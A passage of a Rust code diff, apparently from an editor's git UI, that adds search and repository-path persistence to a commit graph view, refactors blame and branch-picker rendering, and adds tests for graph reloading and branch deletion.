}) + header_context, + Some(header_resize_info), + Some(self.column_widths.entity_id()), + cx, + )) + .child({ + let row_height = self.row_height; + let selected_entry_idx = self.selected_entry_idx; + let hovered_entry_idx = self.hovered_entry_idx; + let weak_self = cx.weak_entity(); + let focus_handle = self.focus_handle.clone(); + + bind_redistributable_columns( + div() + .relative() + .flex_1() + .w_full() + .overflow_hidden() + .child( + h_flex() + .size_full() + .child( + div() + .w(DefiniteLength::Fraction(graph_fraction)) + .h_full() + .min_w_0() + .overflow_hidden() + .child( + div() + .id("graph-canvas") + .size_full() + .overflow_hidden() + .child( + div() + .size_full() + .child(self.render_graph(window, cx)), + ) + .on_scroll_wheel( + cx.listener(Self::handle_graph_scroll), + ) + .on_mouse_move( + cx.listener(Self::handle_graph_mouse_move), + ) + .on_click(cx.listener(Self::handle_graph_click)) + .on_hover(cx.listener( + |this, &is_hovered: &bool, _, cx| { + if !is_hovered + && this.hovered_entry_idx.is_some() + { + this.hovered_entry_idx = None; + cx.notify(); + } + }, + )), + ), + ) + .child( + div() + .w(DefiniteLength::Fraction(table_fraction)) + .h_full() + .min_w_0() + .child( + Table::new(4) + .interactable(&self.table_interaction_state) + .hide_row_borders() + .hide_row_hover() + .width_config(table_width_config) + .map_row(move |(index, row), window, cx| { + let is_selected = + selected_entry_idx == Some(index); + let is_hovered = + hovered_entry_idx == Some(index); + let is_focused = + focus_handle.is_focused(window); + let weak = weak_self.clone(); + let weak_for_hover = weak.clone(); + + let hover_bg = cx + .theme() + .colors() + .element_hover + .opacity(0.6); + let selected_bg = if is_focused { + cx.theme().colors().element_selected + } else { + cx.theme().colors().element_hover + }; + + row.h(row_height) + .when(is_selected, |row| row.bg(selected_bg)) + .when( + is_hovered && !is_selected, + |row| row.bg(hover_bg), + ) + .on_hover(move |&is_hovered, _, cx| { + weak_for_hover + .update(cx, |this, cx| { + if is_hovered { + if this.hovered_entry_idx + != Some(index) + { + this.hovered_entry_idx = + Some(index); + cx.notify(); + } + } else if this + .hovered_entry_idx + == Some(index) + { + this.hovered_entry_idx = + None; + cx.notify(); + } + }) + .ok(); + }) + .on_click(move |event, window, cx| { + let click_count = event.click_count(); + weak.update(cx, |this, cx| { + this.select_entry( + index, + ScrollStrategy::Center, + cx, + ); + if click_count >= 2 { + this.open_commit_view( + index, + window, + cx, + ); + } + }) + .ok(); + }) + .into_any_element() + }) + .uniform_list( + "git-graph-commits", + commit_count, + cx.processor(Self::render_table_rows), + ), + ), + ), + ) + .child(render_redistributable_columns_resize_handles( + &self.column_widths, + window, + cx, + )), + self.column_widths.clone(), + ) + }), + ) .on_drag_move::(cx.listener(|this, event, window, cx| { this.commit_details_split_state.update(cx, |state, cx| { state.on_drag_move(event, window, cx); @@ -2334,10 +2845,33 @@ impl Render for GitGraph { this.open_selected_commit_view(window, cx); })) .on_action(cx.listener(Self::cancel)) + .on_action(cx.listener(|this, _: &FocusSearch, window, cx| { + this.search_state + .editor + .update(cx, |editor, cx| editor.focus_handle(cx).focus(window, cx)); + })) + .on_action(cx.listener(Self::select_first)) .on_action(cx.listener(Self::select_prev)) .on_action(cx.listener(Self::select_next)) + .on_action(cx.listener(Self::select_last)) .on_action(cx.listener(Self::confirm)) - .child(content) + .on_action(cx.listener(|this, _: &SelectNextMatch, _window, cx| { + this.select_next_match(cx); + })) + .on_action(cx.listener(|this, _: &SelectPreviousMatch, _window, cx| { + this.select_previous_match(cx); + })) + .on_action(cx.listener(|this, _: &ToggleCaseSensitive, _window, cx| { + this.search_state.case_sensitive = !this.search_state.case_sensitive; + this.search_state.state.next_state(); + cx.notify(); + })) + .child( + v_flex() + .size_full() + .child(self.render_search_bar(cx)) + .child(div().flex_1().child(content)), + ) .children(self.context_menu.as_ref().map(|(menu, position, _)| { deferred( anchored() @@ -2347,6 +2881,10 @@ impl Render for GitGraph { ) .with_priority(1) })) + .on_action(cx.listener(|_, _: &buffer_search::Deploy, window, cx| { + window.dispatch_action(Box::new(FocusSearch), cx); + cx.stop_propagation(); + })) } } @@ -2366,7 +2904,7 @@ impl Item for GitGraph { } fn tab_tooltip_content(&self, cx: &App) -> Option { - let repo_name = self.get_selected_repository(cx).and_then(|repo| { + let repo_name = self.get_repository(cx).and_then(|repo| { repo.read(cx) .work_directory_abs_path .file_name() @@ -2386,7 +2924,7 @@ impl Item for GitGraph { } fn tab_content_text(&self, _detail: usize, cx: &App) -> SharedString { - self.get_selected_repository(cx) + self.get_repository(cx) .and_then(|repo| { repo.read(cx) .work_directory_abs_path @@ -2405,7 +2943,7 @@ impl Item for GitGraph { } } -impl SerializableItem for GitGraph { +impl workspace::SerializableItem for GitGraph { fn serialized_item_kind() -> &'static str { "GitGraph" } @@ -2420,29 +2958,51 @@ impl SerializableItem for GitGraph { alive_items, workspace_id, "git_graphs", - &persistence::GIT_GRAPHS, + &persistence::GitGraphsDb::global(cx), cx, ) } fn deserialize( - project: Entity, + project: Entity, workspace: WeakEntity, workspace_id: workspace::WorkspaceId, item_id: workspace::ItemId, window: &mut Window, cx: &mut App, ) -> Task>> { - if persistence::GIT_GRAPHS - .get_git_graph(item_id, workspace_id) - .ok() - .is_some_and(|is_open| is_open) - { - let git_graph = cx.new(|cx| GitGraph::new(project, workspace, None, window, cx)); - Task::ready(Ok(git_graph)) - } else { - Task::ready(Err(anyhow::anyhow!("No git graph to deserialize"))) - } + let db = persistence::GitGraphsDb::global(cx); + let Some(repo_work_path) = db.get_git_graph(item_id, workspace_id).ok().flatten() else { + return Task::ready(Err(anyhow::anyhow!("No git graph to deserialize"))); + }; + + let window_handle = window.window_handle(); + let project = project.read(cx); + let git_store = project.git_store().clone(); + let wait = project.wait_for_initial_scan(cx); + + cx.spawn(async move |cx| { + wait.await; + + cx.update_window(window_handle, |_, window, cx| { + let path = repo_work_path.as_path(); + + let repositories = git_store.read(cx).repositories(); + let repo_id = repositories.iter().find_map(|(&repo_id, repo)| { + if repo.read(cx).snapshot().work_directory_abs_path.as_ref() == path { + Some(repo_id) + } else { + None + } + }); + + let Some(repo_id) = repo_id else { + return Err(anyhow::anyhow!("Repository not found for path: {:?}", path)); + }; + + Ok(cx.new(|cx| GitGraph::new(repo_id, git_store, workspace, None, window, cx))) + })? + }) } fn serialize( @@ -2454,9 +3014,17 @@ impl SerializableItem for GitGraph { cx: &mut Context, ) -> Option>> { let workspace_id = workspace.database_id()?; + let repo = self.get_repository(cx)?; + let repo_working_path = repo + .read(cx) + .snapshot() + .work_directory_abs_path + .to_string_lossy() + .to_string(); + + let db = persistence::GitGraphsDb::global(cx); Some(cx.background_spawn(async move { - persistence::GIT_GRAPHS - .save_git_graph(item_id, workspace_id, true) + db.save_git_graph(item_id, workspace_id, repo_working_path) .await })) } @@ -2467,6 +3035,8 @@ impl SerializableItem for GitGraph { } mod persistence { + use std::path::PathBuf; + use db::{ query, sqlez::{domain::Domain, thread_safe_connection::ThreadSafeConnection}, @@ -2479,29 +3049,34 @@ mod persistence { impl Domain for GitGraphsDb { const NAME: &str = stringify!(GitGraphsDb); - const MIGRATIONS: &[&str] = (&[sql!( - CREATE TABLE git_graphs ( - workspace_id INTEGER, - item_id INTEGER UNIQUE, - is_open INTEGER DEFAULT FALSE, - - PRIMARY KEY(workspace_id, item_id), - FOREIGN KEY(workspace_id) REFERENCES workspaces(workspace_id) - ON DELETE CASCADE - ) STRICT; - )]); + const MIGRATIONS: &[&str] = &[ + sql!( + CREATE TABLE git_graphs ( + workspace_id INTEGER, + item_id INTEGER UNIQUE, + is_open INTEGER DEFAULT FALSE, + + PRIMARY KEY(workspace_id, item_id), + FOREIGN KEY(workspace_id) REFERENCES workspaces(workspace_id) + ON DELETE CASCADE + ) STRICT; + ), + sql!( + ALTER TABLE git_graphs ADD COLUMN repo_working_path TEXT; + ), + ]; } - db::static_connection!(GIT_GRAPHS, GitGraphsDb, [WorkspaceDb]); + db::static_connection!(GitGraphsDb, [WorkspaceDb]); impl GitGraphsDb { query! { pub async fn save_git_graph( item_id: workspace::ItemId, workspace_id: workspace::WorkspaceId, - is_open: bool + repo_working_path: String ) -> Result<()> { - INSERT OR REPLACE INTO git_graphs(item_id, workspace_id, is_open) + INSERT OR REPLACE INTO git_graphs(item_id, workspace_id, repo_working_path) VALUES (?, ?, ?) } } @@ -2510,8 +3085,8 @@ mod persistence { pub fn get_git_graph( item_id: workspace::ItemId, workspace_id: workspace::WorkspaceId - ) -> Result { - SELECT is_open + ) -> Result> { + SELECT repo_working_path FROM git_graphs WHERE item_id = ? AND workspace_id = ? } @@ -2536,20 +3111,12 @@ mod tests { use smallvec::{SmallVec, smallvec}; use std::path::Path; use std::sync::{Arc, Mutex}; - use workspace::MultiWorkspace; fn init_test(cx: &mut TestAppContext) { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - }); - } - - fn init_test_with_theme(cx: &mut TestAppContext) { - cx.update(|cx| { - let settings_store = SettingsStore::test(cx); - cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); }); } @@ -3245,14 +3812,8 @@ mod tests { assert!( observed_repository_events .iter() - .any(|event| matches!(event, RepositoryEvent::BranchChanged)), - "initial repository scan should emit BranchChanged" - ); - assert!( - observed_repository_events - .iter() - .any(|event| matches!(event, RepositoryEvent::MergeHeadsChanged)), - "initial repository scan should emit MergeHeadsChanged" + .any(|event| matches!(event, RepositoryEvent::HeadChanged)), + "initial repository scan should emit HeadChanged" ); let commit_count_after = repository.read_with(cx, |repo, _| { repo.get_graph_data(crate::LogSource::default(), crate::LogOrder::default()) @@ -3268,7 +3829,7 @@ mod tests { #[gpui::test] async fn test_graph_data_repopulated_from_cache_after_repo_switch(cx: &mut TestAppContext) { - init_test_with_theme(cx); + init_test(cx); let fs = FakeFs::new(cx.executor()); fs.insert_tree( @@ -3321,13 +3882,21 @@ mod tests { first_repository.update(cx, |repository, cx| repository.set_as_active_repository(cx)); cx.run_until_parked(); - let (multi_workspace, cx) = - cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let (multi_workspace, cx) = cx.add_window_view(|window, cx| { + workspace::MultiWorkspace::test_new(project.clone(), window, cx) + }); let workspace_weak = multi_workspace.read_with(&*cx, |multi, _| multi.workspace().downgrade()); let git_graph = cx.new_window_entity(|window, cx| { - GitGraph::new(project.clone(), workspace_weak, None, window, cx) + GitGraph::new( + first_repository.read(cx).id, + project.read(cx).git_store().clone(), + workspace_weak, + None, + window, + cx, + ) }); cx.run_until_parked(); @@ -3339,8 +3908,8 @@ mod tests { "graph data should have been loaded, got 0 commits" ); - second_repository.update(&mut *cx, |repository, cx| { - repository.set_as_active_repository(cx) + git_graph.update(cx, |graph, cx| { + graph.set_repo_id(second_repository.read(cx).id, cx) }); cx.run_until_parked(); @@ -3351,20 +3920,234 @@ mod tests { "graph_data should be cleared after switching away" ); - first_repository.update(&mut *cx, |repository, cx| { - repository.set_as_active_repository(cx) + git_graph.update(cx, |graph, cx| { + graph.set_repo_id(first_repository.read(cx).id, cx) }); + cx.run_until_parked(); - git_graph.update_in(&mut *cx, |this, window, cx| { - this.render(window, cx); - }); + cx.draw( + point(px(0.), px(0.)), + gpui::size(px(1200.), px(800.)), + |_, _| git_graph.clone().into_any_element(), + ); cx.run_until_parked(); - let commit_count_after_switch_back = + // Verify graph data is reloaded from repository cache on switch back + let reloaded_commit_count = git_graph.read_with(&*cx, |graph, _| graph.graph_data.commits.len()); assert_eq!( - initial_commit_count, commit_count_after_switch_back, - "graph_data should be repopulated from cache after switching back to the same repo" + reloaded_commit_count, + commits.len(), + "graph data should be reloaded after switching back" ); } + + #[gpui::test] + async fn test_graph_data_reloaded_after_stash_change(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + Path::new("/project"), + json!({ + ".git": {}, + "file.txt": "content", + }), + ) + .await; + + let initial_head = Oid::from_bytes(&[1; 20]).unwrap(); + let initial_stash = Oid::from_bytes(&[2; 20]).unwrap(); + let updated_head = Oid::from_bytes(&[3; 20]).unwrap(); + let updated_stash = Oid::from_bytes(&[4; 20]).unwrap(); + + fs.set_graph_commits( + Path::new("/project/.git"), + vec![ + Arc::new(InitialGraphCommitData { + sha: initial_head, + parents: smallvec![initial_stash], + ref_names: vec!["HEAD".into(), "refs/heads/main".into()], + }), + Arc::new(InitialGraphCommitData { + sha: initial_stash, + parents: smallvec![], + ref_names: vec!["refs/stash".into()], + }), + ], + ); + fs.with_git_state(Path::new("/project/.git"), true, |state| { + state.stash_entries = git::stash::GitStash { + entries: vec![git::stash::StashEntry { + index: 0, + oid: initial_stash, + message: "initial stash".to_string(), + branch: Some("main".to_string()), + timestamp: 1, + }] + .into(), + }; + }) + .unwrap(); + + let project = Project::test(fs.clone(), [Path::new("/project")], cx).await; + cx.run_until_parked(); + + let repository = project.read_with(cx, |project, cx| { + project + .active_repository(cx) + .expect("should have a repository") + }); + + let (multi_workspace, cx) = cx.add_window_view(|window, cx| { + workspace::MultiWorkspace::test_new(project.clone(), window, cx) + }); + let workspace_weak = + multi_workspace.read_with(&*cx, |multi, _| multi.workspace().downgrade()); + let git_graph = cx.new_window_entity(|window, cx| { + GitGraph::new( + repository.read(cx).id, + project.read(cx).git_store().clone(), + workspace_weak, + None, + window, + cx, + ) + }); + cx.run_until_parked(); + + let initial_shas = git_graph.read_with(&*cx, |graph, _| { + graph + .graph_data + .commits + .iter() + .map(|commit| commit.data.sha) + .collect::>() + }); + assert_eq!(initial_shas, vec![initial_head, initial_stash]); + + fs.set_graph_commits( + Path::new("/project/.git"), + vec![ + Arc::new(InitialGraphCommitData { + sha: updated_head, + parents: smallvec![updated_stash], + ref_names: vec!["HEAD".into(), "refs/heads/main".into()], + }), + Arc::new(InitialGraphCommitData { + sha: updated_stash, + parents: smallvec![], + ref_names: vec!["refs/stash".into()], + }), + ], + ); + fs.with_git_state(Path::new("/project/.git"), true, |state| { + state.stash_entries = git::stash::GitStash { + entries: vec![git::stash::StashEntry { + index: 0, + oid: updated_stash, + message: "updated stash".to_string(), + branch: Some("main".to_string()), + timestamp: 1, + }] + .into(), + }; + }) + .unwrap(); + + project + .update(cx, |project, cx| project.git_scans_complete(cx)) + .await; + cx.run_until_parked(); + + cx.draw( + point(px(0.), px(0.)), + gpui::size(px(1200.), px(800.)), + |_, _| git_graph.clone().into_any_element(), + ); + cx.run_until_parked(); + + let reloaded_shas = git_graph.read_with(&*cx, |graph, _| { + graph + .graph_data + .commits + .iter() + .map(|commit| commit.data.sha) + .collect::>() + }); + assert_eq!(reloaded_shas, vec![updated_head, updated_stash]); + } + + #[gpui::test] + async fn test_git_graph_row_at_position_rounding(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + Path::new("/project"), + serde_json::json!({ + ".git": {}, + "file.txt": "content", + }), + ) + .await; + + let mut rng = StdRng::seed_from_u64(42); + let commits = generate_random_commit_dag(&mut rng, 10, false); + fs.set_graph_commits(Path::new("/project/.git"), commits.clone()); + + let project = Project::test(fs.clone(), [Path::new("/project")], cx).await; + cx.run_until_parked(); + + let repository = project.read_with(cx, |project, cx| { + project + .active_repository(cx) + .expect("should have a repository") + }); + + let (multi_workspace, cx) = cx.add_window_view(|window, cx| { + workspace::MultiWorkspace::test_new(project.clone(), window, cx) + }); + + let workspace_weak = + multi_workspace.read_with(&*cx, |multi, _| multi.workspace().downgrade()); + + let git_graph = cx.new_window_entity(|window, cx| { + GitGraph::new( + repository.read(cx).id, + project.read(cx).git_store().clone(), + workspace_weak, + None, + window, + cx, + ) + }); + cx.run_until_parked(); + + git_graph.update(cx, |graph, cx| { + assert!( + graph.graph_data.commits.len() >= 10, + "graph should load dummy commits" + ); + + graph.row_height = px(20.0); + let origin_y = px(100.0); + graph.graph_canvas_bounds.set(Some(Bounds { + origin: point(px(0.0), origin_y), + size: gpui::size(px(100.0), px(1000.0)), + })); + + graph.table_interaction_state.update(cx, |state, _| { + state.set_scroll_offset(point(px(0.0), px(-15.0))) + }); + let pos_y = origin_y + px(10.0); + let absolute_calc_row = graph.row_at_position(pos_y, cx); + + assert_eq!( + absolute_calc_row, + Some(1), + "Row calculation should yield absolute row exactly" + ); + }); + } } diff --git a/crates/git_ui/Cargo.toml b/crates/git_ui/Cargo.toml index 28fac0f849a487c6654e2ac5976191cd3e1a733f..e06d16708697f721d9377365223dc444ba7b08ae 100644 --- a/crates/git_ui/Cargo.toml +++ b/crates/git_ui/Cargo.toml @@ -21,13 +21,12 @@ anyhow.workspace = true askpass.workspace = true buffer_diff.workspace = true call.workspace = true -cloud_llm_client.workspace = true collections.workspace = true component.workspace = true db.workspace = true editor.workspace = true +file_icons.workspace = true futures.workspace = true -feature_flags.workspace = true fuzzy.workspace = true git.workspace = true gpui.workspace = true @@ -44,6 +43,7 @@ panel.workspace = true picker.workspace = true project.workspace = true prompt_store.workspace = true +proto.workspace = true remote_connection.workspace = true remote.workspace = true schemars.workspace = true @@ -55,6 +55,7 @@ smol.workspace = true strum.workspace = true telemetry.workspace = true theme.workspace = true +theme_settings.workspace = true time.workspace = true time_format.workspace = true ui.workspace = true @@ -72,7 +73,6 @@ windows.workspace = true [dev-dependencies] ctor.workspace = true editor = { workspace = true, features = ["test-support"] } -git_hosting_providers.workspace = true gpui = { workspace = true, features = ["test-support"] } indoc.workspace = true pretty_assertions.workspace = true diff --git a/crates/git_ui/src/blame_ui.rs b/crates/git_ui/src/blame_ui.rs index e91d98038818224594c1f139f70d7c3d11f2a78b..47d781c4870ade9688b93b75db5a68dd26865ca8 100644 --- a/crates/git_ui/src/blame_ui.rs +++ b/crates/git_ui/src/blame_ui.rs @@ -11,7 +11,7 @@ use gpui::{ use markdown::{Markdown, MarkdownElement}; use project::{git_store::Repository, project_settings::ProjectSettings}; use settings::Settings as _; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use time::OffsetDateTime; use ui::{ContextMenu, CopyButton, Divider, prelude::*, tooltip_container}; use workspace::Workspace; @@ -322,10 +322,11 @@ impl BlameRenderer for GitBlameRenderer { format!("#{}", pr.number), ) .color(Color::Muted) - .icon(IconName::PullRequest) - .icon_color(Color::Muted) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small) + .start_icon( + Icon::new(IconName::PullRequest) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(move |_, _, cx| { cx.stop_propagation(); cx.open_url(pr.url.as_str()) @@ -339,10 +340,11 @@ impl BlameRenderer for GitBlameRenderer { short_commit_id.clone(), ) .color(Color::Muted) - .icon(IconName::FileGit) - .icon_color(Color::Muted) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small) + .start_icon( + Icon::new(IconName::FileGit) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(move |_, window, cx| { CommitView::open( commit_summary.sha.clone().into(), diff --git a/crates/git_ui/src/branch_picker.rs b/crates/git_ui/src/branch_picker.rs index 08290cb88a273d1f3f17da5c08a5b4a402aa74cd..83c8119a077ac1c024dbb3b3df948f762b072ec1 100644 --- a/crates/git_ui/src/branch_picker.rs +++ b/crates/git_ui/src/branch_picker.rs @@ -16,10 +16,7 @@ use project::project_settings::ProjectSettings; use settings::Settings; use std::sync::Arc; use time::OffsetDateTime; -use ui::{ - Divider, HighlightedLabel, KeyBinding, ListHeader, ListItem, ListItemSpacing, Tooltip, - prelude::*, -}; +use ui::{Divider, HighlightedLabel, KeyBinding, ListItem, ListItemSpacing, Tooltip, prelude::*}; use ui_input::ErasedEditor; use util::ResultExt; use workspace::notifications::DetachAndPromptErr; @@ -486,28 +483,28 @@ impl BranchListDelegate { let workspace = self.workspace.clone(); cx.spawn_in(window, async move |picker, cx| { - let mut is_remote = false; + let is_remote; let result = match &entry { - Entry::Branch { branch, .. } => match branch.remote_name() { - Some(remote_name) => { - is_remote = true; - repo.update(cx, |repo, _| repo.remove_remote(remote_name.to_string())) - .await? - } - None => { - repo.update(cx, |repo, _| repo.delete_branch(branch.name().to_string())) - .await? + Entry::Branch { branch, .. } => { + if branch.is_head { + return Ok(()); } - }, + + is_remote = branch.is_remote(); + repo.update(cx, |repo, _| { + repo.delete_branch(is_remote, branch.name().to_string()) + }) + .await? + } _ => { - log::error!("Failed to delete remote: wrong entry to delete"); + log::error!("Failed to delete entry: wrong entry to delete"); return Ok(()); } }; if let Err(e) = result { if is_remote { - log::error!("Failed to delete remote: {}", e); + log::error!("Failed to delete remote branch: {}", e); } else { log::error!("Failed to delete branch: {}", e); } @@ -517,7 +514,7 @@ impl BranchListDelegate { if is_remote { show_error_toast( workspace, - format!("remote remove {}", entry.name()), + format!("branch -dr {}", entry.name()), e, cx, ) @@ -566,8 +563,7 @@ impl PickerDelegate for BranchListDelegate { match self.state { PickerState::List | PickerState::NewRemote | PickerState::NewBranch => { match self.branch_filter { - BranchFilter::All => "Select branch or remote…", - BranchFilter::Remote => "Select remote…", + BranchFilter::All | BranchFilter::Remote => "Select branch…", } } PickerState::CreateRemote(_) => "Enter a name for this remote…", @@ -891,13 +887,13 @@ impl PickerDelegate for BranchListDelegate { let entry_icon = match entry { Entry::NewUrl { .. } | Entry::NewBranch { .. } | Entry::NewRemoteName { .. } => { - Icon::new(IconName::Plus).color(Color::Muted) + IconName::Plus } Entry::Branch { branch, .. } => { if branch.is_remote() { - Icon::new(IconName::Screen).color(Color::Muted) + IconName::Screen } else { - Icon::new(IconName::GitBranchAlt).color(Color::Muted) + IconName::GitBranchAlt } } }; @@ -929,8 +925,11 @@ impl PickerDelegate for BranchListDelegate { Entry::NewUrl { .. } | Entry::NewBranch { .. } | Entry::NewRemoteName { .. } ); - let deleted_branch_icon = |entry_ix: usize, is_head_branch: bool| { + let is_head_branch = entry.as_branch().is_some_and(|branch| branch.is_head); + + let deleted_branch_icon = |entry_ix: usize| { IconButton::new(("delete", entry_ix), IconName::Trash) + .icon_size(IconSize::Small) .tooltip(move |_, cx| { Tooltip::for_action_in( "Delete Branch", @@ -939,7 +938,6 @@ impl PickerDelegate for BranchListDelegate { cx, ) }) - .disabled(is_head_branch) .on_click(cx.listener(move |this, _, window, cx| { this.delegate.delete_at(entry_ix, window, cx); })) @@ -950,6 +948,7 @@ impl PickerDelegate for BranchListDelegate { let focus_handle = self.focus_handle.clone(); IconButton::new("create_from_default", IconName::GitBranchPlus) + .icon_size(IconSize::Small) .tooltip(move |_, cx| { Tooltip::for_action_in( tooltip_label.clone(), @@ -972,137 +971,139 @@ impl PickerDelegate for BranchListDelegate { .child( h_flex() .w_full() - .gap_3() + .gap_2p5() .flex_grow() - .child(entry_icon) + .child( + Icon::new(entry_icon) + .color(Color::Muted) + .size(IconSize::Small), + ) .child( v_flex() .id("info_container") .w_full() .child(entry_title) - .child( - h_flex() - .w_full() - .justify_between() - .gap_1p5() - .when(self.style == BranchListStyle::Modal, |el| { - el.child(div().max_w_96().child({ - let message = match entry { - Entry::NewUrl { url } => { - format!("Based off {url}") - } - Entry::NewRemoteName { url, .. } => { - format!("Based off {url}") - } - Entry::NewBranch { .. } => { - if let Some(current_branch) = - self.repo.as_ref().and_then(|repo| { - repo.read(cx) - .branch - .as_ref() - .map(|b| b.name()) - }) - { - format!("Based off {}", current_branch) - } else { - "Based off the current branch" - .to_string() - } - } - Entry::Branch { .. } => { - let show_author_name = - ProjectSettings::get_global(cx) - .git - .branch_picker - .show_author_name; - - subject.map_or( - "No commits found".into(), - |subject| { - if show_author_name - && let Some(author) = - author_name - { - format!( - "{} • {}", - author, subject - ) - } else { - subject.to_string() - } - }, - ) - } - }; - - Label::new(message) - .size(LabelSize::Small) - .color(Color::Muted) - .truncate() - })) - }) - .when_some(commit_time, |label, commit_time| { - label.child( - Label::new(commit_time) - .size(LabelSize::Small) - .color(Color::Muted), - ) - }), - ) + .child({ + let message = match entry { + Entry::NewUrl { url } => format!("Based off {url}"), + Entry::NewRemoteName { url, .. } => { + format!("Based off {url}") + } + Entry::NewBranch { .. } => { + if let Some(current_branch) = + self.repo.as_ref().and_then(|repo| { + repo.read(cx).branch.as_ref().map(|b| b.name()) + }) + { + format!("Based off {}", current_branch) + } else { + "Based off the current branch".to_string() + } + } + Entry::Branch { .. } => String::new(), + }; + + if matches!(entry, Entry::Branch { .. }) { + let show_author_name = ProjectSettings::get_global(cx) + .git + .branch_picker + .show_author_name; + let has_author = show_author_name && author_name.is_some(); + let has_commit = commit_time.is_some(); + let author_for_meta = + if show_author_name { author_name } else { None }; + + let dot = || { + Label::new("•") + .alpha(0.5) + .color(Color::Muted) + .size(LabelSize::Small) + }; + + h_flex() + .w_full() + .min_w_0() + .gap_1p5() + .when_some(author_for_meta, |this, author| { + this.child( + Label::new(author) + .color(Color::Muted) + .size(LabelSize::Small), + ) + }) + .when_some(commit_time, |this, time| { + this.when(has_author, |this| this.child(dot())) + .child( + Label::new(time) + .color(Color::Muted) + .size(LabelSize::Small), + ) + }) + .when_some(subject, |this, subj| { + this.when(has_commit, |this| this.child(dot())) + .child( + Label::new(subj.to_string()) + .color(Color::Muted) + .size(LabelSize::Small) + .truncate() + .flex_1(), + ) + }) + .when(!has_commit, |this| { + this.child( + Label::new("No commits found") + .color(Color::Muted) + .size(LabelSize::Small), + ) + }) + .into_any_element() + } else { + Label::new(message) + .size(LabelSize::Small) + .color(Color::Muted) + .truncate() + .into_any_element() + } + }) .when_some( entry.as_branch().map(|b| b.name().to_string()), - |this, branch_name| this.tooltip(Tooltip::text(branch_name)), + |this, branch_name| { + this.map(|this| { + if is_head_branch { + this.tooltip(move |_, cx| { + Tooltip::with_meta( + branch_name.clone(), + None, + "Current Branch", + cx, + ) + }) + } else { + this.tooltip(Tooltip::text(branch_name)) + } + }) + }, ), ), ) - .when( - self.editor_position() == PickerEditorPosition::End && !is_new_items, - |this| { - this.map(|this| { - let is_head_branch = - entry.as_branch().is_some_and(|branch| branch.is_head); - if self.selected_index() == ix { - this.end_slot(deleted_branch_icon(ix, is_head_branch)) - } else { - this.end_hover_slot(deleted_branch_icon(ix, is_head_branch)) - } - }) - }, - ) + .when(!is_new_items && !is_head_branch, |this| { + this.end_slot(deleted_branch_icon(ix)) + .show_end_slot_on_hover() + }) .when_some( - if self.editor_position() == PickerEditorPosition::End && is_new_items { + if is_new_items { create_from_default_button } else { None }, |this, create_from_default_button| { - this.map(|this| { - if self.selected_index() == ix { - this.end_slot(create_from_default_button) - } else { - this.end_hover_slot(create_from_default_button) - } - }) + this.end_slot(create_from_default_button) + .show_end_slot_on_hover() }, ), ) } - fn render_header( - &self, - _window: &mut Window, - _cx: &mut Context>, - ) -> Option { - matches!(self.state, PickerState::List).then(|| { - let label = match self.branch_filter { - BranchFilter::All => "Branches", - BranchFilter::Remote => "Remotes", - }; - - ListHeader::new(label).inset(true).into_any_element() - }) - } - fn render_footer(&self, _: &mut Window, cx: &mut Context>) -> Option { if self.editor_position() == PickerEditorPosition::End { return None; @@ -1144,20 +1145,29 @@ impl PickerDelegate for BranchListDelegate { let delete_and_select_btns = h_flex() .gap_1() - .child( - Button::new("delete-branch", "Delete") - .key_binding( - KeyBinding::for_action_in( - &branch_picker::DeleteBranch, - &focus_handle, - cx, - ) - .map(|kb| kb.size(rems_from_px(12.))), + .when( + !selected_entry + .and_then(|entry| entry.as_branch()) + .is_some_and(|branch| branch.is_head), + |this| { + this.child( + Button::new("delete-branch", "Delete") + .key_binding( + KeyBinding::for_action_in( + &branch_picker::DeleteBranch, + &focus_handle, + cx, + ) + .map(|kb| kb.size(rems_from_px(12.))), + ) + .on_click(|_, window, cx| { + window.dispatch_action( + branch_picker::DeleteBranch.boxed_clone(), + cx, + ); + }), ) - .on_click(|_, window, cx| { - window - .dispatch_action(branch_picker::DeleteBranch.boxed_clone(), cx); - }), + }, ) .child( Button::new("select_branch", "Select") @@ -1197,7 +1207,11 @@ impl PickerDelegate for BranchListDelegate { this.justify_between() .child({ let focus_handle = focus_handle.clone(); - Button::new("filter-remotes", "Filter Remotes") + let filter_label = match self.branch_filter { + BranchFilter::All => "Filter Remote", + BranchFilter::Remote => "Show All", + }; + Button::new("filter-remotes", filter_label) .toggle_state(matches!( self.branch_filter, BranchFilter::Remote @@ -1301,7 +1315,7 @@ mod tests { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); }); } @@ -1390,7 +1404,9 @@ mod tests { (branch_list, cx) } - async fn init_fake_repository(cx: &mut TestAppContext) -> Entity { + async fn init_fake_repository( + cx: &mut TestAppContext, + ) -> (Entity, Entity) { let fs = FakeFs::new(cx.executor()); fs.insert_tree( path!("/dir"), @@ -1413,7 +1429,7 @@ mod tests { let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; let repository = cx.read(|cx| project.read(cx).active_repository(cx)); - repository.unwrap() + (project, repository.unwrap()) } #[gpui::test] @@ -1476,7 +1492,7 @@ mod tests { #[gpui::test] async fn test_delete_branch(cx: &mut TestAppContext) { init_test(cx); - let repository = init_fake_repository(cx).await; + let (_project, repository) = init_fake_repository(cx).await; let branches = create_test_branches(); @@ -1511,6 +1527,30 @@ mod tests { }); cx.run_until_parked(); + let expected_branches = ["main", "feature-auth", "feature-ui", "develop"] + .into_iter() + .filter(|name| name != &branch_to_delete) + .collect::>(); + let repo_branches = branch_list + .update(cx, |branch_list, cx| { + branch_list.picker.update(cx, |picker, cx| { + picker + .delegate + .repo + .as_ref() + .unwrap() + .update(cx, |repo, _cx| repo.branches()) + }) + }) + .await + .unwrap() + .unwrap(); + let repo_branches = repo_branches + .iter() + .map(|b| b.name()) + .collect::>(); + assert_eq!(&repo_branches, &expected_branches); + branch_list.update(cx, move |branch_list, 